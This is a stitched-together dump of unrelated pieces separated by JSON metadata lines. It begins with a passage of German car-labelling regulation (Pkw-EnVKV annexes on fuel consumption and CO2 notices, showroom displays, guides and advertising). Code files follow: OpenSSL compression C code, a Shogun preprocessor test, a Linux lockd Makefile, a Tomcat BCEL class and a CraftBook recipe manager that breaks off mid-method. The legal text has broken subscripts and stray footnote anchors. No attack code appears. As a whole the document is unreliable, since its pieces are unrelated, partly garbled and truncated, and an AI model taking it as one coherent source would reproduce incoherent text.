offiziellen spezifischen CO
2 -Emissionen und des offiziellen Stromverbrauchs im
kombinierten Testzyklus nach Maßgabe des Satzes 1 anzugeben; eine
Angabe zum offiziellen Kraftstoffverbrauch für die Testzyklen
innerorts und außerorts ist nicht vorzunehmen und durch die Eintragung
„entfällt“ im Formblatt nach Abschnitt II zu kennzeichnen. Die Werte
der kombinierten Testzyklen für den offiziellen Kraftstoffverbrauch,
für die offiziellen spezifischen CO
2 -Emissionen und den offiziellen Stromverbrauch des
Fahrzeugs müssen sich in allen Fällen der Nummer 4 durch einen
größeren Schriftgrad aus dem gesamten Text herausheben.
5. Den Angaben nach Nummer 4 können folgende Hinweise hinzugefügt werden:
a) Die angegebenen Werte wurden nach dem vorgeschriebenen Messverfahren
(§ 2 Nrn. 5, 6, 6a Pkw-EnVKV in der jeweils geltenden Fassung)
ermittelt.
b) CO
2 -Emissionen, die durch die Produktion und
Bereitstellung des Kraftstoffes bzw. anderer Energieträger entstehen,
werden bei Ermittlung der CO
2 -Emissionen gemäß der Richtlinie 1999/94/EG
nicht berücksichtigt.
c) Die Angaben beziehen sich nicht auf ein einzelnes Fahrzeug und sind
nicht Bestandteil des Angebots, sondern dienen allein
Vergleichszwecken zwischen den verschiedenen Fahrzeugtypen.
6. Darunter sind unter der Überschrift „Hinweis nach Richtlinie
1999/94/EG“ folgende Informationen aufzunehmen:
„Der Kraftstoffverbrauch und die CO
2 -Emissionen eines Fahrzeugs hängen nicht nur von
der effizienten Ausnutzung des Kraftstoffs durch das Fahrzeug ab,
sondern werden auch vom Fahrverhalten und anderen nichttechnischen
Faktoren beeinflusst. CO
2 ist das für die Erderwärmung hauptsächlich
verantwortliche Treibhausgas. Ein Leitfaden über den
Kraftstoffverbrauch und die CO
2 -Emissionen aller in Deutschland angebotenen neuen
Personenkraftfahrzeugmodelle ist unentgeltlich an jedem Verkaufsort in
Deutschland erhältlich, an dem neue Personenkraftfahrzeuge ausgestellt
oder angeboten werden.“
7. Nach Nummer 6 ist unter der Überschrift „CO
2 -Effizienz“ und dem in fett hervorgehobenen
Hinweis „Auf der Grundlage der gemessenen CO
2 -Emissionen unter Berücksichtigung der Masse des
Fahrzeugs ermittelt“ eine grafische Darstellung unter Verwendung der
in § 3a Absatz 2 festgelegten CO
2 -Effizienzklassen für das jeweilige Fahrzeug
anzufügen. Die grafische Darstellung muss dem in Teil A Abschnitt II
beschriebenen Formblatt entsprechen. Dabei sind folgende
Farbzusammensetzungen zur Darstellung der CO
2 -Effizienzklassen zu verwenden:
A +, A 100 % Cyan, 100 % Gelb
B 70 % Cyan, 100 % Gelb
C 30 % Cyan, 100 % Gelb
D 100 % Gelb
E 30 % Magenta, 100 % Gelb
F 70 % Magenta, 100 % Gelb
G 100 % Magenta, 100 % Gelb.
Die CO
2 -Effizienz des Fahrzeugs wird mittels eines in
schwarz-weiß dargestellten Pfeils ausgedrückt, der in weißer
Schriftfarbe auch den Kennzeichnungsbuchstaben der entsprechenden CO
2 -Effizienzklasse trägt. Die Spitze dieses Pfeils
muss der Spitze des Pfeils der CO
2 -Effizienzklasse genau gegenüberstehen. Der Pfeil
mit dem Kennzeichnungsbuchstaben darf nicht kleiner sein als der Pfeil
mit Angabe der CO
2 -Effizienzklasse, darf aber auch nicht mehr als
doppelt so groß sein.
8. Anschließend sind die Jahressteuer für das jeweilige Fahrzeug,
ausgenommen Elektrofahrzeuge, sowie die jährlichen Energieträgerkosten
bei einer Laufleistung von 20 000 Kilometern, unterteilt in
Kraftstoffkosten und gegebenenfalls Stromkosten anzugeben. Hinter dem
Begriff Kraftstoffkosten ist in Klammern derjenige Kraftstoff
anzugeben, auf den sich die Angaben zum offiziellen
Kraftstoffverbrauch und zu den offiziellen spezifischen CO
2 -Emissionen im Sinne der Anlage 1 Abschnitt I
Nummer 4 beziehen. Sofern es sich um ein Fahrzeug mit mehr als einem
flüssigen oder gasförmigen Energieträger handelt, ist der in Klammern
anzugebende Kraftstoff in Übereinstimmung zur Darstellung im Sinne der
Anlage 1 Abschnitt 1 Nummer 4 kursiv hervorzuheben. Für die Angabe der
Kraftstoff- und gegebenenfalls Stromkosten sind diejenigen
Preisangaben zugrunde zu legen, die das Bundesministerium für
Wirtschaft und Technologie jährlich im Bundesanzeiger veröffentlicht.
Die erste Preisliste wird mit Verkündung dieser Verordnung im
Bundesanzeiger veröffentlicht. In den Folgejahren aktualisiert das
Bundesministerium für Wirtschaft und Technologie die Preisangaben
jährlich durch Veröffentlichung im Bundesanzeiger zum 30. Juni eines
Jahres. Die jeweils zum 30. Juni eines Jahres im Bundesanzeiger
aktualisierten Preise sind für neue Personenkraftwagen, die nach dem
30\. Juni eines Jahres ausgestellt oder zum Kauf oder Leasing angeboten
werden, spätestens nach drei Monaten ab dem Datum der Veröffentlichung
im Bundesanzeiger anzuwenden. Die Preisliste erfasst Kraftstoffe im
Sinne der Verordnung über die Beschaffenheit und die Auszeichnung der
Qualitäten von Kraft- und Brennstoffen in der jeweils geltenden
Fassung und Strom, sofern für den jeweiligen Kraftstoff
beziehungsweise für den Strom ein marktgängiger Preis feststellbar
ist.
9. Darunter ist die Angabe „Erstellt am:“ einzufügen und das Datum der
Erstellung des Hinweises mit Tages-, Monats- und Jahreszahlangabe
einzutragen.
**Abschnitt II**
Formblatt für den Hinweis auf den Kraftstoffverbrauch,
die CO
[^F775581_02_BJNR103700004BJNE001201140]
2 **-Emissionen und den Stromverbrauch**
##
**B.**
Anforderungen an den Hinweis
## **gemäß § 3 Absatz 1 Nummer 1 mit weiteren Effizienzklassen**
**Abschnitt I**
Inhalt und Gestaltung des Hinweises
auf den Kraftstoffverbrauch, die CO
## 2 **-Emissionen und den Stromverbrauch**
1. Es gelten die Anforderungen des Teils A, Abschnitt I dieser Anlage,
soweit nachfolgend nichts anderes bestimmt ist.
2. Unter der Überschrift „CO
2 -Effizienz“ und dem in fett hervorgehobenen
Hinweis „Auf der Grundlage der gemessenen CO
2 -Emissionen unter Berücksichtigung der Masse des
Fahrzeugs ermittelt“ ist eine grafische Darstellung unter Verwendung
der in § 3a Absatz 3 festgelegten CO
2 -Effizienzklassen für das jeweilige Fahrzeug
anzufügen. Sie muss dem in Teil B Abschnitt II beziehungsweise
Abschnitt III beschriebenen Formblatt entsprechen. Bei Einführung der
Klasse A ++ sind folgende Farbzusammensetzungen zur Darstellung der CO
2 -Effizienzklassen zu verwenden:
A ++, A + 100 % Cyan, 100 % Gelb
A 70 % Cyan, 100 % Gelb
B, C 30 % Cyan, 100 % Gelb
D 100 % Gelb
E 70 % Magenta, 100 % Gelb
F, G 100 % Magenta, 100 % Gelb.
Bei Einführung der Klasse A +++ oder bei gleichzeitiger Einführung der
Klassen A ++ und A +++ sind die folgenden Farbzusammensetzungen zur
Darstellung der CO
2 -Effizienzklassen zu verwenden:
A +++, A ++ 100 % Cyan, 100 % Gelb
A + 70 % Cyan, 100 % Gelb
A, B 30 % Cyan, 100 % Gelb
C 100 % Gelb
D 70 % Magenta, 100 % Gelb
E, F, G 100 % Magenta, 100 % Gelb.
**Abschnitt II**
Formblatt für den Hinweis auf den Kraftstoffverbrauch,
die CO
2 **-Emissionen und den Stromverbrauch bei Einführung der
Effizienzklasse A ++**
##
**Abschnitt III**
Formblatt für den Hinweis auf den Kraftstoffverbrauch,
die CO
2 **-Emissionen und den Stromverbrauch bei Einführung der
Effizienzklasse A +++**
##
Das Bundesministerium für Wirtschaft und Technologie kann im
Bundesanzeiger die Bezugsquelle bekannt geben, über die das Formblatt
unentgeltlich elektronisch bezogen werden kann.
[^F775581_02_BJNR103700004BJNE001201140]:
## Anlage 2 (zu § 3 Abs. 1 Nr. 2) Aushang am Verkaufsort über Kraftstoffverbrauch, CO 2 -Emissionen und den Stromverbrauch
(Fundstelle: BGBl. I 2004, 1042;
bezüglich der einzelnen Änderungen vgl. Fußnote)
* * Abschnitt I
* * Aushang
1. Der Aushang muss mindestens 70 cm x 50 cm groß sein.
2. Die Angaben müssen gut lesbar sein.
3. Vertreibt ein Händler Personenkraftfahrzeuge mehrerer Fabrikmarken und
bringt er nicht für jede Fabrikmarke einen eigenen Aushang an, sind
die Fabrikmarken in alphabetischer Reihenfolge aufzulisten.
4. Der Aushang ist mit "Aushang nach Richtlinie 1999/94/EG" und folgendem
Hinweis zu überschreiben:
* * "Kraftstoffverbrauch, CO
2 -Emissionswerte und Stromverbrauch
aller an diesem Verkaufsort ausgestellten oder
bestellbaren Personenkraftwagen der Marke (N. N.)".
5. Die Personenkraftwagenmodelle sind in Gruppen getrennt nach
Kraftstoffart beziehungsweise anderen Energieträgern aufzulisten,
wobei bezüglich der Kraftstoffart verschiedene Qualitäten von
Kraftstoffen zusammengefasst werden können (z. B. Super und Super Plus
zu Ottokraftstoff). Bei jeder Kraftstoffart beziehungsweise bei
anderen Energieträgern sind die einzelnen Modelle in aufsteigender
Reihenfolge nach den offiziellen spezifischen CO
2 -Emissionen im kombinierten Testzyklus anzuführen,
wobei das Modell mit der günstigsten CO
2 -Effizienzklasse und dem geringsten offiziellen
Kraftstoffverbrauch beziehungsweise dem geringsten offiziellen
Stromverbrauch im kombinierten Testzyklus an oberster Stelle steht.
6. Für jedes Personenkraftwagenmodell auf der Liste sind anzugeben:
– das Modell, konkretisiert durch Hubraum, Leistung, Getriebe und Masse,
– die CO
2 -Effizienzklasse,
– der offizielle Kraftstoffverbrauch im kombinierten Testzyklus,
– die offiziellen spezifischen CO
2 -Emissionen im kombinierten Testzyklus,
– gegebenenfalls der offizielle Stromverbrauch im kombinierten
Testzyklus.
Bei Personenkraftwagenmodellen mit mehr als einem flüssigen oder
gasförmigen Energieträger sind die in Satz 1 genannten Angaben für
alle Kraftstoffe einzutragen. Gleiches gilt für extern aufladbare
Hybridelektrofahrzeuge und Brennstoffzellenfahrzeuge, bei denen die in
Satz 1 genannten Angaben sowohl für den Kraftstoff als auch für den
anderen Energieträger (Strom) einzutragen sind. Sofern unter einem
Modell mehrere Varianten und/oder Versionen zusammengefasst werden, so
sind die Werte des offiziellen Kraftstoffverbrauchs, der offiziellen
spezifischen CO
2 -Emissionen und des offiziellen Stromverbrauchs im
kombinierten Testzyklus jedenfalls auf der Grundlage der Variante oder
Version mit dem jeweils höchsten offiziellen Wert anzugeben.
Entsprechendes gilt für die CO
2 -Effizienzklasse, bei welcher jedenfalls die
schlechteste Effizienzklasse der jeweiligen Variante oder Version
anzugeben ist. Bei der Angabe der Masse ist jedenfalls der höchste
Massewert der jeweiligen Variante oder Version anzugeben.
7. Die in Anlage 1 Abschnitt I Nr. 5 aufgeführten Hinweise können
angegeben werden.
8. Die in Anlage 1 Abschnitt I Nr. 6 aufgeführten Hinweise sind auch auf
dem Aushang in deutlich lesbarer Schriftgröße aufzunehmen.
9. Der Aushang ist mindestens alle sechs Monate zu aktualisieren.
* * Abschnitt II
* * Elektronische Anzeige durch Bildschirm
1. Der Aushang kann durch eine elektronische Anzeige auf einem Bildschirm
ersetzt werden. Der verwendete Bildschirm muss so angebracht sein,
dass der die Aufmerksamkeit der Verbraucher ebenso stark erweckt wie
ein Aushang.
2. Der Bildschirm muss mindestens 25 cm x 32 cm (17 Zoll) groß sein. Die
Informationen können unter Verwendung von Rolltechniken (Scrolling)
gezeigt werden.
3. Die unter Abschnitt I Nr. 2 bis 9 für den Aushang gestellten
Anforderungen gelten bei Verwendung eines Bildschirms entsprechend mit
folgenden Maßgaben:
a) Es ist sicherzustellen, dass die in Anlage 1 Abschnitt I Nr. 6
aufgeführten Hinweise ständig sichtbar sind.
b) Die Angaben sind mindestens alle drei Monate zu aktualisieren.
## Anlage 3 (zu § 4 Abs. 2 Satz 1) Leitfaden über Kraftstoffverbrauch, CO 2 -Emissionen und Stromverbrauch
(Fundstelle: BGBl. I 2004, 1043;
bezüglich der einzelnen Änderungen vgl. Fußnote)
Der Leitfaden über den Kraftstoffverbrauch, die CO
2 -Emissionen und den Stromverbrauch enthält zumindest
folgende Angaben:
* * Teil I
1. Einen Hinweis an den Kraftfahrer, dass Kraftstoffverbrauch und CO
2 -Emissionen sich durch eine regelmäßige Wartung
des Fahrzeugs, dessen richtige Benutzung und eine entsprechende
Fahrweise vermindern lassen, insbesondere durch einen defensiven
Fahrstil, niedrige Reisegeschwindigkeiten, vorausschauendes
Bremsverhalten, richtigen Reifendruck, keinen unnötigen Leerlauf des
Motors und keinen überflüssigen Ballast;
2. sowohl eine Erläuterung der Auswirkungen von Treibhausgasemissionen,
einer möglichen Klimaänderung und der Bedeutung von Kraftfahrzeugen
hierbei als auch einen Hinweis auf die Möglichkeiten, die der
Verbraucher bei der Wahl der zur Verfügung stehenden Kraftstoffe hat
und deren Umweltauswirkungen, gegründet auf aktuelle wissenschaftliche
Nachweise und geltende Rechtsvorschriften;
3. einen Hinweis auf das aktuelle Ziel der Europäischen Gemeinschaften
für die durchschnittlichen CO
2 -Emissionen neuer Personenkraftwagen sowie auf die
Frist zur Erreichung dieses Ziels;
4. einen Hinweis auf den Leitfaden der Kommission über den
Kraftstoffverbrauch und die CO
2 -Emissionen in Internet, falls vorhanden.
* * Teil II
1. einen Hinweis, dass die tatsächlich die Umwelt belastenden CO
2 -Emissionen auch von der Produktion und
Bereitstellung des Kraftstoffs bzw. der anderen Energieträger abhängen
und dass der Fahrzeugnutzer durch die Verwendung von möglichst CO
2 -arm erzeugtem Kraftstoff bzw. erzeugter Energie
den CO
2 -Ausstoß insgesamt verringern kann;
2. Eine Auflistung aller Modelle neuer Personenkraftwagen, die in
Deutschland angeboten oder ausgestellt werden, auf Jahresbasis und
aufgeschlüsselt nach Fabrikmarken in alphabetischer Reihenfolge; der
Leitfaden wird mindestens einmal jährlich aktualisiert, so dass er
eine Auflistung aller Modelle enthält, die zum Zeitpunkt der
Veröffentlichung dieser Aktualisierung angeboten oder ausgestellt
werden;
3. für jedes im Leitfaden aufgeführte Modell – im Einzelnen konkretisiert
durch Hubraum, Leistung, Getriebe und Masse des Fahrzeugs – die
Kraftstoffart beziehungsweise den anderen Energieträger, wobei
bezüglich der Kraftstoffart, verschiedene Qualitäten eines Kraftstoffs
zusammengefasst werden können (z. B. Super und Super Plus zu
Ottokraftstoff), die CO
2 -Effizienzklasse, den offiziellen
Kraftstoffverbrauch (Werte des Testzyklus innerorts und außerorts
sowie kombiniert), die offiziellen spezifischen CO
2 -Emissionen im kombinierten Testzyklus und
gegebenenfalls den offiziellen Stromverbrauch im kombinierten
Testzyklus. Bei Personenkraftwagenmodellen mit mehr als einem
flüssigen oder gasförmigen Energieträger sind die in Satz 1 genannten
Angaben für alle Kraftstoffe einzutragen. Gleiches gilt für extern
aufladbare Hybridelektrofahrzeuge und Brennstoffzellenfahrzeuge, bei
denen die in Satz 1 genannten Angaben sowohl für den Kraftstoff als
auch für den anderen Energieträger (Strom) einzutragen sind. Sofern
unter einem Modell mehrere Varianten und/oder Versionen
zusammengefasst werden, so sind die Werte des offiziellen
Kraftstoffverbrauchs, der offiziellen spezifischen CO
2 -Emissionen und des offiziellen Stromverbrauchs im
kombinierten Testzyklus jedenfalls auf der Grundlage der Variante oder
Version mit dem jeweils höchsten offiziellen Wert anzugeben.
Entsprechendes gilt für die CO
2 -Effizienzklasse, bei welcher jedenfalls die
schlechteste Effizienzklasse der jeweiligen Variante oder Version
anzugeben ist. Bei der Angabe der Masse ist jedenfalls der höchste
Massewert der jeweiligen Variante oder Version anzugeben;
4. für jede Kraftstoffart eine hervorgehobene Auflistung der zehn
sparsamsten neuen Personenkraftwagenmodelle unter Angabe der CO
2 -Effizienzklasse, des offiziellen
Kraftstoffverbrauchs im kombinierten Testzyklus, der offiziellen
spezifischen CO
2 -Emissionen im kombinierten Testzyklus und
gegebenenfalls des offiziellen Stromverbrauchs im kombinierten
Testzyklus, beginnend jeweils mit dem Modell mit den niedrigsten CO
2 -Emissionswerten.
Der Leitfaden soll das Format DIN A4 nicht überschreiten.
## Anlage 4 (zu § 5) Angaben über Kraftstoffverbrauch und CO 2 -Emissionen in der Werbung
(Fundstelle: BGBl. I 2004, 1044;
bezüglich der einzelnen Änderungen vgl. Fußnote)
* * Abschnitt I
* * Werbeschriften
1. Für das in der Werbeschrift genannte Fahrzeugmodell sind Angaben über
den offiziellen Kraftstoffverbrauch (Werte des Testzyklus innerorts
und außerorts sowie kombiniert) und die offiziellen spezifischen CO
2 -Emissionen im kombinierten Testzyklus zu machen.
Wird für mehrere Modelle geworben, sind entweder die in Satz 1
genannten Werte für jedes einzelne der aufgeführten Modelle anzuführen
oder die Spannbreite zwischen ungünstigstem und günstigstem
offiziellen Kraftstoffverbrauch im kombinierten Testzyklus sowie den
offiziellen spezifischen CO
2 -Emissionen im kombinierten Testzyklus anzugeben.
2. Die Angaben müssen auch bei flüchtigem Lesen leicht verständlich, gut
lesbar und nicht weniger hervorgehoben sein als der Hauptteil der
Werbebotschaft.
3. Wird lediglich für die Fabrikmarke und nicht für ein bestimmtes Modell
geworben, so ist eine Angabe der Kraftstoffverbrauchs- und CO
2 -Werte nicht erforderlich.
4. Werden Fahrzeugmodelle in Katalogen oder auf einem anderen Weg in
gedruckter Form zum Kauf oder Leasing angeboten, bei dem Interessenten
die Fahrzeuge nicht ausgestellt sehen, so sind die in Abschnitt I
Nummer 1 Satz 1 aufgeführten Angaben und zusätzlich die CO
2 -Effizienzklasse anzugeben. Bei der Angabe der
Effizienzklasse ist sowohl das Wort „Effizienzklasse“ als auch der
entsprechende Buchstabe der jeweiligen CO
2 -Effizienzklasse zu nennen. Abschnitt I Nummer 2
gilt entsprechend. Abschnitt I Nummer 3 gilt entsprechend mit der
Maßgabe, dass bei Vorliegen der Voraussetzungen der Nummer 3 auch eine
Angabe der CO
2 -Effizienzklasse entbehrlich ist.
* * Abschnitt II
* * In elektronischer Form verbreitetes Werbematerial
1. In Werbematerial, das in elektronischer Form verbreitetet wird, muss
der folgende Hinweis enthalten sein:
"Weitere Informationen zum offiziellen Kraftstoffverbrauch und den
offiziellen spezifischen CO
2 -Emissionen neuer Personenkraftwagen können dem
'Leitfaden über den Kraftstoffverbrauch, die CO
2 -Emissionen und den Stromverbrauch neuer
Personenkraftwagen' entnommen werden, der an allen Verkaufsstellen und
bei (... Verweis auf die benannte deutsche Stelle oder direkte
Verknüpfung zu der Organisation, die mit der Verbreitung der
Informationen in elektronischer Form beauftragt ist ...) unentgeltlich
erhältlich ist."
2. Bezieht sich das Werbematerial auf ein bestimmtes neues Fahrzeugmodell
oder auf eine bestimmte Version oder Variante davon, sind zumindest
der offizielle Kraftstoffverbrauch im kombinierten Testzyklus und die
offiziellen spezifischen CO
2 -Emissionen im kombinierten Testzyklus dieses
Fahrzeugs so anzugeben wie auf dem Hinweis auf den Kraftstoffverbrauch
(Anlage 1). Abschnitt I Nr. 3 gilt entsprechend.
3. Die Angaben müssen auch bei flüchtigem Lesen leicht verständlich, gut
lesbar und nicht weniger hervorgehoben sein als der Hauptteil der
Werbebotschaft. Es ist sicherzustellen, dass dem Empfänger des
Werbematerials die Informationen im Sinne von Abschnitt II Nummer 2
Satz 1 automatisch in dem Augenblick zur Kenntnis gelangen, in dem
erstmalig Angaben zur Motorisierung, zum Beispiel zu Motorleistung,
Hubraum oder Beschleunigung, auf der Internetseite angezeigt werden.
4. Wer als Hersteller oder Händler Fahrzeugmodelle im Internet ausstellt
oder zum Kauf oder Leasing anbietet (virtueller Verkaufsraum), hat die
Angaben nach Abschnitt II Nummer 2 Satz 1 sowie zusätzlich die CO
2 -Effizienzklasse einschließlich der grafischen
Darstellung gemäß Anlage 1 zu § 3 Absatz 1 Nummer 1 bei der
Beschreibung des Fahrzeugmodells anzugeben und einen Hinweis auf die
Internetadresse beizufügen, unter welcher der Leitfaden über den
Kraftstoffverbrauch, die CO
2 -Emissionen und den Stromverbrauch abgerufen
werden kann; der Händler kann in Bezug auf die grafische Darstellung
auf die entsprechenden Internetseiten des Herstellers hinweisen. Die
Angaben müssen auch bei flüchtigem Lesen leicht verständlich sein. Es
ist sicherzustellen, dass die Angaben nach Abschnitt II Nummer 2 Satz
1 sowie die CO
2 -Effizienzklassen einschließlich der grafischen
Darstellungen dem Benutzer spätestens in dem Augenblick zur Kenntnis
gelangen, in welchem er ein Fahrzeugmodell ausgewählt oder eine
Konfiguration abgeschlossen hat.
* * Abschnitt III
* * Elektronische, magnetische oder optische Speichermedien
1. Erfolgt Marketing oder Werbung durch elektronische, magnetische oder
optische Speichermedien, muss der nach Abschnitt II Nr. 1
erforderliche Hinweis ebenfalls gegeben werden. Der Hinweis kann dabei
in gesprochener oder visueller Form erfolgen.
2. Abschnitt II Nr. 2 und 3 Satz 1 gilt entsprechend.
| {
"pile_set_name": "Github"
} |
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <openssl/objects.h>
#include <openssl/comp.h>
COMP_CTX *COMP_CTX_new(COMP_METHOD *meth)
{
COMP_CTX *ret;
if ((ret=(COMP_CTX *)OPENSSL_malloc(sizeof(COMP_CTX))) == NULL)
{
/* ZZZZZZZZZZZZZZZZ */
return(NULL);
}
memset(ret,0,sizeof(COMP_CTX));
ret->meth=meth;
if ((ret->meth->init != NULL) && !ret->meth->init(ret))
{
OPENSSL_free(ret);
ret=NULL;
}
return(ret);
}
void COMP_CTX_free(COMP_CTX *ctx)
{
if(ctx == NULL)
return;
if (ctx->meth->finish != NULL)
ctx->meth->finish(ctx);
OPENSSL_free(ctx);
}
int COMP_compress_block(COMP_CTX *ctx, unsigned char *out, int olen,
unsigned char *in, int ilen)
{
int ret;
if (ctx->meth->compress == NULL)
{
/* ZZZZZZZZZZZZZZZZZ */
return(-1);
}
ret=ctx->meth->compress(ctx,out,olen,in,ilen);
if (ret > 0)
{
ctx->compress_in+=ilen;
ctx->compress_out+=ret;
}
return(ret);
}
int COMP_expand_block(COMP_CTX *ctx, unsigned char *out, int olen,
unsigned char *in, int ilen)
{
int ret;
if (ctx->meth->expand == NULL)
{
/* ZZZZZZZZZZZZZZZZZ */
return(-1);
}
ret=ctx->meth->expand(ctx,out,olen,in,ilen);
if (ret > 0)
{
ctx->expand_in+=ilen;
ctx->expand_out+=ret;
}
return(ret);
}
| {
"pile_set_name": "Github"
} |
/*
* This software is distributed under BSD 3-clause license (see LICENSE file).
*
* Author: Nanubala Gnana Sai
*/
#include <gtest/gtest.h>
#include <shogun/features/DenseFeatures.h>
#include <shogun/kernel/GaussianKernel.h>
#include <shogun/lib/SGVector.h>
#include <shogun/mathematics/linalg/LinalgNamespace.h>
#include <shogun/preprocessor/RFFPreprocessor.h>
using namespace shogun;
using namespace random;
class RFFPreprocessorTest : public ::testing::Test
{
public:
virtual void SetUp()
{
SGMatrix<float64_t> mat(num_features, num_vectors);
linalg::range_fill(mat, 1.0);
auto gauss = std::make_shared<GaussianKernel>(width);
auto features = std::make_shared<DenseFeatures<float64_t>>(mat);
preproc = std::make_shared<RFFPreprocessor>();
preproc->put(kSeed, seed);
preproc->set_kernel(gauss);
preproc->set_dim_output(target_dim);
preproc->fit(features);
}
virtual void TearDown()
{
}
protected:
const int32_t seed = 100;
const index_t num_vectors = 5;
const index_t num_features = 3;
const index_t target_dim = 400;
const float64_t width = 1.5;
const float64_t epsilon = 0.04;
std::shared_ptr<RFFPreprocessor> preproc;
};
TEST_F(RFFPreprocessorTest, apply)
{
SGMatrix<float64_t> matrix(num_features, 2);
linalg::range_fill(matrix, 1.0);
auto feats = std::make_shared<DenseFeatures<float64_t>>(matrix);
auto preprocessed = preproc->transform(feats)
->as<DenseFeatures<float64_t>>()
->get_feature_matrix();
auto result_rff =
linalg::dot(preprocessed.get_column(0), preprocessed.get_column(1));
auto gauss_kernel = std::make_shared<GaussianKernel>();
gauss_kernel->set_width(width);
gauss_kernel->init(feats, feats);
auto result_kernel = gauss_kernel->kernel(0, 1);
EXPECT_NEAR(result_rff, result_kernel, epsilon);
}
TEST_F(RFFPreprocessorTest, apply_to_vectors)
{
SGVector<float64_t> vec1 = {1.0, 2.0, 3.0};
SGVector<float64_t> vec2 = {4.0, 5.0, 6.0};
auto mat = SGMatrix<float64_t>(num_features, 2);
linalg::range_fill(mat, 1.0);
auto processed1 = preproc->apply_to_feature_vector(vec1);
auto processed2 = preproc->apply_to_feature_vector(vec2);
auto result_rff = linalg::dot(processed1, processed2);
auto gauss_kernel = std::make_shared<GaussianKernel>();
auto feats = std::make_shared<DenseFeatures<float64_t>>(mat);
gauss_kernel->set_width(width);
gauss_kernel->init(feats, feats);
auto result_kernel = gauss_kernel->kernel(0, 1);
EXPECT_NEAR(result_rff, result_kernel, epsilon);
}
| {
"pile_set_name": "Github"
} |
#
# Makefile for the linux lock manager stuff
#
obj-$(CONFIG_LOCKD) += lockd.o
lockd-objs-y := clntlock.o clntproc.o clntxdr.o host.o svc.o svclock.o \
svcshare.o svcproc.o svcsubs.o mon.o xdr.o grace.o
lockd-objs-$(CONFIG_LOCKD_V4) += clnt4xdr.o xdr4.o svc4proc.o
lockd-objs := $(lockd-objs-y)
| {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*/
package org.apache.tomcat.util.bcel.classfile;
import java.io.DataInput;
import java.io.IOException;
import org.apache.tomcat.util.bcel.Const;
/**
* This class is derived from the abstract {@link Constant}
* and represents a reference to a float object.
*
* @see Constant
*/
public final class ConstantFloat extends Constant {
private final float bytes;
/**
* Initialize instance from file data.
*
* @param file Input stream
* @throws IOException
*/
ConstantFloat(final DataInput file) throws IOException {
super(Const.CONSTANT_Float);
this.bytes = file.readFloat();
}
/**
* @return data, i.e., 4 bytes.
*/
public float getBytes() {
return bytes;
}
}
| {
"pile_set_name": "Github"
} |
package com.sk89q.craftbook.mechanics.crafting;
import java.io.IOException;
import java.util.*;
import com.sk89q.craftbook.bukkit.util.CraftBookBukkitUtil;
import org.bukkit.inventory.ItemStack;
import com.sk89q.craftbook.bukkit.CraftBookPlugin;
import com.sk89q.craftbook.util.ItemSyntax;
import com.sk89q.craftbook.util.ItemUtil;
import com.sk89q.craftbook.util.RegexUtil;
import com.sk89q.util.yaml.YAMLProcessor;
public class RecipeManager {
public static RecipeManager INSTANCE;
private Set<Recipe> recipes;
protected YAMLProcessor config;
public RecipeManager(YAMLProcessor config) {
INSTANCE = this;
this.config = config;
load();
}
public void load() {
recipes = new LinkedHashSet<>();
if (config == null) {
CraftBookPlugin.logger().severe("Failure loading recipes! Config is null!");
return; // If the config is null, it can't continue.
}
try {
config.load();
} catch (IOException e) {
CraftBookPlugin.logger().severe("Corrupt Custom Crafting crafting-recipes.yml File! Make sure that the correct syntax has been used, and that there are no tabs!");
e.printStackTrace();
}
config.setHeader(
"# CraftBook Custom Recipes. CraftBook Version: " + CraftBookPlugin.inst().getDescription().getVersion(),
"# For more information on setting up custom recipes, see the wiki:",
"# " + CraftBookPlugin.getWikiDomain() + "/Custom_crafting",
"",
"");
List<String> keys = config.getKeys("crafting-recipes");
if (keys != null) {
for (String key : keys) {
try {
recipes.add(new Recipe(key, config));
} catch (InvalidCraftingException e) {
CraftBookBukkitUtil.printStacktrace(e);
}
}
}
}
public void disable() {
INSTANCE = null;
}
public void save() {
if (config == null) {
CraftBookPlugin.logger().severe("Failure saving recipes! Config is null!");
return; // If the config is null, it can't continue.
}
config.clear();
config.setHeader(
"# CraftBook Custom Recipes. CraftBook Version: " + CraftBookPlugin.inst().getDescription().getVersion(),
"# For more information on setting up custom recipes, see the wiki:",
"# " + CraftBookPlugin.getWikiDomain() + "/Custom_crafting",
"",
"");
config.addNode("crafting-recipes");
for(Recipe recipe : recipes)
recipe.save();
config.save();
load();
}
public Collection<Recipe> getRecipes() {
return recipes;
}
public void addRecipe(Recipe rec) {
recipes.add(rec);
save();
}
public boolean removeRecipe(String name) {
Iterator<Recipe> recs = recipes.iterator();
while(recs.hasNext()) {
Recipe rec = recs.next();
if(rec.getId().equalsIgnoreCase(name)) {
recs.remove();
save();
return true;
}
}
return false;
}
public final class Recipe {
private final String id;
private RecipeType type;
private List<CraftingItemStack> ingredients;
private LinkedHashMap<CraftingItemStack, Character> items;
private CraftingItemStack result;
private List<String> shape;
private float experience;
private int cookTime;
@Override
public boolean equals(Object o) {
if(o instanceof Recipe) {
if(shape != null)
if(shape.size() != ((Recipe)o).shape.size())
return false;
if(ingredients != null) {
if(ingredients.size() != ((Recipe)o).ingredients.size())
return false;
List<CraftingItemStack> stacks = new ArrayList<>(ingredients);
for(CraftingItemStack st : ((Recipe)o).ingredients) {
if(stacks.size() <= 0)
return false;
Iterator<CraftingItemStack> it = stacks.iterator();
while(it.hasNext()) {
CraftingItemStack sta = it.next();
if(st.equals(sta)) {
it.remove();
break;
}
}
}
if(stacks.size() > 0)
return false;
}
if(items != null) {
if(items.size() != ((Recipe)o).items.size())
return false;
List<CraftingItemStack> stacks = new ArrayList<>(items.keySet());
for(CraftingItemStack st : ((Recipe)o).items.keySet()) {
if(stacks.size() <= 0)
return false;
Iterator<CraftingItemStack> it = stacks.iterator();
while(it.hasNext()) {
CraftingItemStack sta = it.next();
if(st.equals(sta)) {
it.remove();
break;
}
}
}
if(stacks.size() > 0)
return false;
}
if(advancedData != null)
if(advancedData.size() != ((Recipe)o).advancedData.size())
return false;
return ((Recipe) o).id.equals(id) && type == ((Recipe)o).type && result.equals(((Recipe)o).result);
}
else
return false;
}
